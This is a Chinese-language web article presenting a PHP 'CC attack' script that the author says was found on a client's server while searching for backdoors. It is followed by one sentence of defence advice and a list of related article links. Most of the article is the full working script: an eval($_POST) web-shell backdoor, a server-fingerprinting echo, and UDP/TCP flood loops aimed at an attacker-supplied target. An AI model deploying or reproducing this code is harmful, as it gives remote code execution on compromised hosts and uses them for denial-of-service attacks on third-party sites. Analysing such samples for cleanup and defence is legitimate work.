php cc攻击代码与防范方法
2015-01-24信息快讯网
今天把客户查找后门的时候发现的代码,特分享下,看到这样的代码就是黑客用来攻击别人访问,不断访问指定网站,导致网站无法访问,我们的网站就是帮凶了,同时我们自己的网站或服务器也会无法访问,所以一定要注意防范。
cc攻击代码,支持udp
<?php
eval($_POST[Chr(90)]);
set_time_limit(86400);
ignore_user_abort(True);
$packets = 0;
$http = $_GET['http'];
$rand = $_GET['exit'];
$exec_time = $_GET['time'];
if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0)
{
if(StrLen($_GET['rat'])<>0)
{
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Php 2012 Terminator";
exit;
}
for($i=0;$i<65535;$i++)
{
$out .= "X";
}
//Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center
$max_time = time()+$exec_time;
if($rand==53)
while(1)
{
$packets++;
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
if($rand==500)
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
?>
对于cc攻击的防范,如果是动态页面,我们可以判断时间,如果是静态的网站我们就需要服务器上安装防cc攻击的软件了, 一般服务器安全狗还是不错的。
如果你有好的软件也可以给我们留言。
php实现cc攻击防御和防止快速刷新页面示例
PHP删除HTMl标签的三种解决方法
PHP删除HTMl标签的实现代码
浅析php面向对象public private protected 访问修饰符
解析link_mysql的php版
分享8个最佳的代码片段在线测试网站
php 验证码(倾斜,正弦干扰线,黏贴,旋转)
浅谈web上存漏洞及原理分析、防范方法(文件名检测漏洞)
探讨:web上存漏洞及原理分析、防范方法
浅谈web上存漏洞及原理分析、防范方法(安全文件上存方法)
PHP 过滤页面中的BOM(实现代码)
PHP遍历某个目录下的所有文件和子文件夹的实现代码
下拉列表多级联动dropDownList示例代码
浅析PHP程序防止ddos,dns,集群服务器攻击的解决办法
基于PHP开发中的安全防范知识详解
php页面缓存ob系列函数介绍
php shell超强免杀、减少体积工具实现代码
PHP中替换换行符的几种方法小结
php变量范围介绍
php模板函数 正则实现代码
php mssql扩展SQL查询中文字段名解决方法
php标签云的实现代码
php在程序中将网页生成word文档并提供下载的代码
php全排列递归算法代码
细谈php中SQL注入攻击与XSS攻击
php DOS攻击实现代码(附如何防范)
PHP代码网站如何防范SQL注入漏洞攻击建议分享
PHP中全面阻止SQL注入式攻击分析小结
PHP防CC攻击实现代码
PHP安全防范技巧分享
PHP与SQL注入攻击防范小技巧